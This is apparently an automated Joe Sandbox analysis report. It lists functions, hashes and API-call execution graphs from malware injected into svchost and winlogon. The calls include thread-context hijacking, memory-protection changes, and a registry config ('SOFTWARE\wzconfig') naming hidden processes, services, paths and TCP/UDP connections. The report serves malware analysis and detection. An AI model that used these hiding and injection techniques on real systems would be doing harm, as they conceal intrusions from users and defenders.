                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction ID: 333fcd61bbf4bc4705204bb4755e8e41bc7211cc0803d2090206793338cfd2e6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE5106322047A189EE25DF29A05C3EE67A2F3A5B80FC64025DE9E03F99DE39D54DC740
                                                                                                                                                                                                                                                Function 00000216819C2C60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction ID: 7adbb29521ce76c1c4d67e17dd5508aaeaefbe1d060ec9816d2b3e566ac1df88
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03419072714A908AEB60DF65E84C3EE67A0F7A8794F824121EE8D87798EB7CC545C740
                                                                                                                                                                                                                                                Function 00000216819B8A58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction ID: 5592283a4664d3341b5304dcf7baee73327e261ec94aa728d918a66c94bc1116
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A112832219B8082EF618B15F44829EB7E5F798B94F5A4625EFCD07B68EF3CC5558B00
                                                                                                                                                                                                                                                Function 00000216819B1BFC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction ID: ad3ebd189bd1ce3a754ad231f4adb9a8daf251f527b4edceabcd72025bdb08a4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5118F35A01B5489EE05DF66B40C2AD67A1FBD9FC1F5A4024DE4D43765EE38C446C300
                                                                                                                                                                                                                                                Function 00000216819B1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction ID: ca825b209141a05a67d147eb67ff52e222250f1688b920899263023ae9d1fecd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49E0ED756116048AEB049F62E81C39E7AE1FBD9F56F46C024C98907351DF7DC499C750

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:1.5%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:95.1%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:123
                                                                                                                                                                                                                                                Total number of Limit Nodes:16
                                                                                                                                                                                                                                                execution_graph 16150 1ca7d1e3ac9 16155 1ca7d1e3a16 16150->16155 16151 1ca7d1e3a80 16152 1ca7d1e3a66 VirtualQuery 16152->16151 16152->16155 16153 1ca7d1e3a9a VirtualAlloc 16153->16151 16154 1ca7d1e3acb GetLastError 16153->16154 16154->16151 16154->16155 16155->16151 16155->16152 16155->16153 16156 1ca7d1e1ac4 16161 1ca7d1e1630 GetProcessHeap 16156->16161 16158 1ca7d1e1ada Sleep SleepEx 16159 1ca7d1e1ad3 16158->16159 16159->16158 16160 1ca7d1e15a0 StrCmpIW StrCmpW 16159->16160 16160->16159 16162 1ca7d1e1650 _invalid_parameter_noinfo 16161->16162 16206 1ca7d1e1268 GetProcessHeap 16162->16206 16164 1ca7d1e1658 16165 1ca7d1e1268 2 API calls 16164->16165 16166 1ca7d1e1669 16165->16166 16167 1ca7d1e1268 2 API calls 16166->16167 16168 1ca7d1e1672 16167->16168 16169 1ca7d1e1268 2 API calls 16168->16169 16170 1ca7d1e167b 16169->16170 16171 1ca7d1e1696 RegOpenKeyExW 16170->16171 16172 1ca7d1e16c8 RegOpenKeyExW 16171->16172 16173 1ca7d1e18ae 16171->16173 16174 1ca7d1e1707 RegOpenKeyExW 16172->16174 16175 1ca7d1e16f1 16172->16175 16173->16159 16177 1ca7d1e1742 RegOpenKeyExW 16174->16177 16178 1ca7d1e172b 16174->16178 16217 1ca7d1e12bc RegQueryInfoKeyW 16175->16217 16179 1ca7d1e1766 16177->16179 16180 1ca7d1e177d RegOpenKeyExW 16177->16180 16210 1ca7d1e104c RegQueryInfoKeyW 16178->16210 16183 1ca7d1e12bc 13 API calls 16179->16183 16184 1ca7d1e17b8 RegOpenKeyExW 16180->16184 16185 1ca7d1e17a1 16180->16185 16187 1ca7d1e1773 RegCloseKey 16183->16187 16189 1ca7d1e17f3 RegOpenKeyExW 16184->16189 16190 1ca7d1e17dc 16184->16190 16188 1ca7d1e12bc 13 API calls 16185->16188 16187->16180 16191 1ca7d1e17ae RegCloseKey 16188->16191 16193 1ca7d1e1817 16189->16193 16194 1ca7d1e182e RegOpenKeyExW 16189->16194 16192 1ca7d1e12bc 13 API calls 16190->16192 16191->16184 16197 1ca7d1e17e9 RegCloseKey 16192->16197 16198 1ca7d1e104c 5 API calls 16193->16198 16195 1ca7d1e1869 RegOpenKeyExW 16194->16195 16196 1ca7d1e1852 16194->16196 16200 1ca7d1e18a4 RegCloseKey 16195->16200 16201 1ca7d1e188d 16195->16201 16199 1ca7d1e104c 5 API calls 16196->16199 16197->16189 16202 1ca7d1e1824 RegCloseKey 16198->16202 16203 1ca7d1e185f RegCloseKey 16199->16203 16200->16173 16204 1ca7d1e104c 5 API calls 16201->16204 16202->16194 16203->16195 16205 1ca7d1e189a RegCloseKey 16204->16205 16205->16200 16228 1ca7d1f6168 16206->16228 16208 1ca7d1e1283 GetProcessHeap 16209 1ca7d1e12ae _invalid_parameter_noinfo 16208->16209 16209->16164 16211 1ca7d1e11b5 RegCloseKey 16210->16211 16212 1ca7d1e10bf 16210->16212 16211->16177 16212->16211 16213 1ca7d1e10cf RegEnumValueW 16212->16213 16215 1ca7d1e1125 _invalid_parameter_noinfo 16213->16215 16214 1ca7d1e114e GetProcessHeap 16214->16215 16215->16211 16215->16213 16215->16214 16216 1ca7d1e116e GetProcessHeap HeapFree 16215->16216 16216->16215 16218 1ca7d1e1327 GetProcessHeap 16217->16218 16219 1ca7d1e148a RegCloseKey 16217->16219 16222 1ca7d1e133e _invalid_parameter_noinfo 16218->16222 16219->16174 16220 1ca7d1e1476 GetProcessHeap HeapFree 16220->16219 16221 1ca7d1e1352 RegEnumValueW 16221->16222 16222->16220 16222->16221 16224 1ca7d1e13d3 GetProcessHeap 16222->16224 16225 1ca7d1e141e lstrlenW GetProcessHeap 16222->16225 16226 1ca7d1e1443 StrCpyW 16222->16226 16227 1ca7d1e13f3 GetProcessHeap HeapFree 16222->16227 16230 1ca7d1e1534 16222->16230 16224->16222 16225->16222 16226->16222 16227->16225 16229 1ca7d1f6177 16228->16229 16233 1ca7d1e1584 16230->16233 16234 1ca7d1e154e 16230->16234 16231 1ca7d1e1565 StrCmpIW 16231->16234 16232 1ca7d1e156d StrCmpW 16232->16234 16233->16222 16234->16231 16234->16232 16234->16233 16235 1ca7d1e5d00 16236 1ca7d1e5d0d 16235->16236 16237 1ca7d1e5d19 16236->16237 16243 1ca7d1e5e2a 16236->16243 16238 1ca7d1e5d4e 16237->16238 16239 1ca7d1e5d9d 16237->16239 16240 1ca7d1e5d76 SetThreadContext 16238->16240 16240->16239 16241 1ca7d1e5e51 VirtualProtect FlushInstructionCache 16241->16243 16242 1ca7d1e5f0e 16244 1ca7d1e5f2e 16242->16244 16257 1ca7d1e43f0 16242->16257 16243->16241 16243->16242 16253 1ca7d1e4e00 GetCurrentProcess 16244->16253 16246 1ca7d1e5f33 16248 1ca7d1e5f47 ResumeThread 16246->16248 16250 1ca7d1e5f87 16246->16250 16249 1ca7d1e5f7b 16248->16249 16249->16246 16261 1ca7d1e7950 16250->16261 16252 1ca7d1e5fcf 16254 1ca7d1e4e1c 16253->16254 16255 1ca7d1e4e32 VirtualProtect FlushInstructionCache 16254->16255 16256 1ca7d1e4e63 16254->16256 16255->16254 16256->16246 16260 1ca7d1e440c 16257->16260 16258 1ca7d1e446f 16258->16244 16259 1ca7d1e4422 VirtualFree 16259->16260 16260->16258 16260->16259 16262 1ca7d1e7959 16261->16262 16263 1ca7d1e7964 16262->16263 16264 1ca7d1e8128 IsProcessorFeaturePresent 16262->16264 16263->16252 16265 1ca7d1e8140 capture_previous_context 16264->16265 16265->16252 16266 1ca7d1e28dc 16268 1ca7d1e2922 16266->16268 16267 1ca7d1e2984 16268->16267 16270 1ca7d1e3858 16268->16270 16271 1ca7d1e3865 StrCmpNIW 16270->16271 16272 1ca7d1e387a 16270->16272 16271->16272 16272->16268 16273 1ca7d1e555d 16275 1ca7d1e5564 16273->16275 16274 1ca7d1e55cb 16275->16274 16276 1ca7d1e5647 VirtualProtect 16275->16276 16277 1ca7d1e5673 GetLastError 16276->16277 16278 1ca7d1e5681 16276->16278 16277->16278 16279 1ca7d1b2750 16280 1ca7d1b277e 16279->16280 16281 1ca7d1b27d9 VirtualAlloc 16280->16281 16284 1ca7d1b28e8 16280->16284 16283 1ca7d1b2800 16281->16283 16281->16284 16282 1ca7d1b286c LoadLibraryA 16282->16283 16283->16282 16283->16284

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 000001CA7D1E1630 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                                                                                • API String ID: 106492572-440640706
                                                                                                                                                                                                                                                • Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction ID: 9ab28105617f9f4d7831693b50e93b4076cf9e458c14d77aa972915aef88bcfd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7711737B51B1986FB119F62E880ED933A4FB85B8DF811111DA4E43B68DF3AC484C396
                                                                                                                                                                                                                                                Function 000001CA7D1E37A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                                                                                • String ID: wr
                                                                                                                                                                                                                                                • API String ID: 1092925422-2678910430
                                                                                                                                                                                                                                                • Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction ID: 8ec04587158281d2d9dad587585733f8651462eefbddc6046d8ec44daa99c3b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D118E37B4574482FF259B52F404AAA72A0FB89F8AF840129DE8903B54EF3EC504C746
                                                                                                                                                                                                                                                Function 000001CA7D1E5B40 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 59 1ca7d1e5b40-1ca7d1e5b67 60 1ca7d1e5b69-1ca7d1e5b78 59->60 61 1ca7d1e5b7b-1ca7d1e5b86 GetCurrentThreadId 59->61 60->61 62 1ca7d1e5b88-1ca7d1e5b8d 61->62 63 1ca7d1e5b92-1ca7d1e5b99 61->63 66 1ca7d1e5fbf-1ca7d1e5fd6 call 1ca7d1e7950 62->66 64 1ca7d1e5bab-1ca7d1e5bbf 63->64 65 1ca7d1e5b9b-1ca7d1e5ba6 call 1ca7d1e5970 63->65 68 1ca7d1e5bce-1ca7d1e5bd4 64->68 65->66 71 1ca7d1e5ca5-1ca7d1e5cc6 68->71 72 1ca7d1e5bda-1ca7d1e5be3 68->72 78 1ca7d1e5e2f-1ca7d1e5e40 call 1ca7d1e74cf 71->78 79 1ca7d1e5ccc-1ca7d1e5cec GetThreadContext 71->79 75 1ca7d1e5be5-1ca7d1e5c28 call 1ca7d1f5090 72->75 76 1ca7d1e5c2a-1ca7d1e5c9d call 1ca7d1e4520 call 1ca7d1e44c0 call 1ca7d1e4480 72->76 87 1ca7d1e5ca0 75->87 76->87 91 1ca7d1e5e45-1ca7d1e5e4b 78->91 83 1ca7d1e5cf2-1ca7d1e5d13 79->83 84 1ca7d1e5e2a 79->84 83->84 92 1ca7d1e5d19-1ca7d1e5d22 83->92 84->78 87->68 94 1ca7d1e5e51-1ca7d1e5ea8 VirtualProtect FlushInstructionCache 91->94 95 1ca7d1e5f0e-1ca7d1e5f1e 91->95 96 1ca7d1e5d24-1ca7d1e5d35 92->96 97 1ca7d1e5da2-1ca7d1e5db3 92->97 100 1ca7d1e5ed9-1ca7d1e5f09 call 1ca7d1e78b8 94->100 101 1ca7d1e5eaa-1ca7d1e5eb4 94->101 104 1ca7d1e5f20-1ca7d1e5f27 95->104 105 1ca7d1e5f2e-1ca7d1e5f3a call 1ca7d1e4e00 95->105 106 1ca7d1e5d37-1ca7d1e5d4c 96->106 107 1ca7d1e5d9d 96->107 102 1ca7d1e5e25 97->102 103 1ca7d1e5db5-1ca7d1e5dd3 97->103 100->91 101->100 109 1ca7d1e5eb6-1ca7d1e5ed1 call 1ca7d1e43a0 101->109 103->102 111 1ca7d1e5dd5-1ca7d1e5e1c call 1ca7d1e3910 103->111 104->105 112 1ca7d1e5f29 call 1ca7d1e43f0 104->112 121 1ca7d1e5f3f-1ca7d1e5f45 105->121 106->107 113 1ca7d1e5d4e-1ca7d1e5d98 call 1ca7d1e3980 SetThreadContext 106->113 107->102 109->100 111->102 126 1ca7d1e5e20 call 1ca7d1e74ed 111->126 112->105 113->107 124 1ca7d1e5f87-1ca7d1e5fa5 121->124 125 1ca7d1e5f47-1ca7d1e5f85 ResumeThread call 1ca7d1e78b8 121->125 128 1ca7d1e5fb9 124->128 129 1ca7d1e5fa7-1ca7d1e5fb6 124->129 125->121 126->102 128->66 129->128
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1666949209-0
                                                                                                                                                                                                                                                • Opcode ID: bb6e1daf763caff3280ddda97538b795954ea030298127e76771fb68279c5f11
                                                                                                                                                                                                                                                • Instruction ID: 5c05e1e5ecc0651991b550fbc0c94235542ffdcd75a6674f26f374849764ce7f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb6e1daf763caff3280ddda97538b795954ea030298127e76771fb68279c5f11
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AD1CB37644B8882FA71DB16E49079AB7A0F788B89F500212EACD477A5DF3DC541CB82
                                                                                                                                                                                                                                                Function 000001CA7D1E50E0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 131 1ca7d1e50e0-1ca7d1e510c 132 1ca7d1e510e-1ca7d1e5116 131->132 133 1ca7d1e511d-1ca7d1e5126 131->133 132->133 134 1ca7d1e5128-1ca7d1e5130 133->134 135 1ca7d1e5137-1ca7d1e5140 133->135 134->135 136 1ca7d1e5142-1ca7d1e514a 135->136 137 1ca7d1e5151-1ca7d1e515a 135->137 136->137 138 1ca7d1e5166-1ca7d1e5171 GetCurrentThreadId 137->138 139 1ca7d1e515c-1ca7d1e5161 137->139 141 1ca7d1e5173-1ca7d1e5178 138->141 142 1ca7d1e517d-1ca7d1e5184 138->142 140 1ca7d1e56e3-1ca7d1e56ea 139->140 141->140 143 1ca7d1e5186-1ca7d1e518c 142->143 144 1ca7d1e5191-1ca7d1e519a 142->144 143->140 145 1ca7d1e51a6-1ca7d1e51b2 144->145 146 1ca7d1e519c-1ca7d1e51a1 144->146 147 1ca7d1e51b4-1ca7d1e51d9 145->147 148 1ca7d1e51de-1ca7d1e5235 call 1ca7d1e56f0 * 2 145->148 146->140 147->140 153 1ca7d1e5237-1ca7d1e523e 148->153 154 1ca7d1e524a-1ca7d1e5253 148->154 157 1ca7d1e5246 153->157 158 1ca7d1e5240 153->158 155 1ca7d1e5265-1ca7d1e526e 154->155 156 1ca7d1e5255-1ca7d1e5262 154->156 159 1ca7d1e5283-1ca7d1e52a8 call 1ca7d1e787c 155->159 160 1ca7d1e5270-1ca7d1e5280 155->160 156->155 157->154 162 1ca7d1e52b6-1ca7d1e52ba 157->162 161 1ca7d1e52c0-1ca7d1e52c6 158->161 172 1ca7d1e52ae 159->172 173 1ca7d1e533d-1ca7d1e5352 call 1ca7d1e3cd0 159->173 160->159 163 1ca7d1e52c8-1ca7d1e52e4 call 1ca7d1e43a0 161->163 164 1ca7d1e52f5-1ca7d1e52fb 161->164 162->161 163->164 174 1ca7d1e52e6-1ca7d1e52ee 163->174 167 1ca7d1e5325-1ca7d1e5338 164->167 168 1ca7d1e52fd-1ca7d1e531c call 1ca7d1e78b8 164->168 167->140 168->167 172->162 178 1ca7d1e5354-1ca7d1e535c 173->178 179 1ca7d1e5361-1ca7d1e536a 173->179 174->164 178->162 180 1ca7d1e537c-1ca7d1e53ca call 1ca7d1f5730 179->180 181 1ca7d1e536c-1ca7d1e5379 179->181 184 1ca7d1e53d2-1ca7d1e53da 180->184 181->180 185 1ca7d1e54e7-1ca7d1e54ef 184->185 186 1ca7d1e53e0-1ca7d1e54cb call 1ca7d1e7450 184->186 187 1ca7d1e5533-1ca7d1e553b 185->187 188 1ca7d1e54f1-1ca7d1e5504 call 1ca7d1e45a0 185->188 198 1ca7d1e54cf-1ca7d1e54de call 1ca7d1e4070 186->198 199 1ca7d1e54cd 186->199 191 1ca7d1e5547-1ca7d1e5556 187->191 192 1ca7d1e553d-1ca7d1e5545 187->192 201 1ca7d1e5508-1ca7d1e5531 188->201 202 1ca7d1e5506 188->202 196 1ca7d1e5558 191->196 197 1ca7d1e555f 191->197 192->191 195 1ca7d1e5564-1ca7d1e5571 192->195 203 1ca7d1e5574-1ca7d1e55c9 call 1ca7d1f5090 195->203 204 1ca7d1e5573 195->204 196->197 197->195 208 1ca7d1e54e2 198->208 209 1ca7d1e54e0 198->209 199->185 201->185 202->187 210 1ca7d1e55d8-1ca7d1e5671 call 1ca7d1e4520 call 1ca7d1e4480 VirtualProtect 203->210 211 1ca7d1e55cb-1ca7d1e55d3 203->211 204->203 208->184 209->185 216 1ca7d1e5673-1ca7d1e5678 GetLastError 210->216 217 1ca7d1e5681-1ca7d1e56e1 210->217 216->217 217->140
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: c3d7fdcc31d1e74926da01ee871671d3c0ed7e2ef0909a2a1c762ceeae194f43
                                                                                                                                                                                                                                                • Instruction ID: 9156b42a81309df7a60c261afd2316abbb79b349619a0c02224a01ac2ec13a04
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3d7fdcc31d1e74926da01ee871671d3c0ed7e2ef0909a2a1c762ceeae194f43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A021A33649B8886F761CB55F49079AB7A0F7C4789F500015EA8E87BA9DF7DC444CB82
                                                                                                                                                                                                                                                Function 000001CA7D1E39F0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Virtual$AllocQuery
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 31662377-0
                                                                                                                                                                                                                                                • Opcode ID: 583c9a696cbd2eed1741be8d9dfd6b22d02d31c25e0c094f16caf77a54ebc047
                                                                                                                                                                                                                                                • Instruction ID: 611f96c174db5e12ab381184d84b39c11c659b9b8cc276fc81eacf61a152ff8d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 583c9a696cbd2eed1741be8d9dfd6b22d02d31c25e0c094f16caf77a54ebc047
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA313433A59B4881FB32DA15E05479AB7A0FB84B8EF900515F5CD46B99DF3EC5808B83
                                                                                                                                                                                                                                                Function 000001CA7D1E32A0 Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1683269324-0
                                                                                                                                                                                                                                                • Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction ID: c82ee47a6ee21ed23934ef6add0532bd6daf23a1234905dce6844197f9e6dc7c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63117C32E9074D82F7629760A809FD97290BF54B0FFC040259446816A2EF3BC44983C3
                                                                                                                                                                                                                                                Function 000001CA7D1E4E00 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
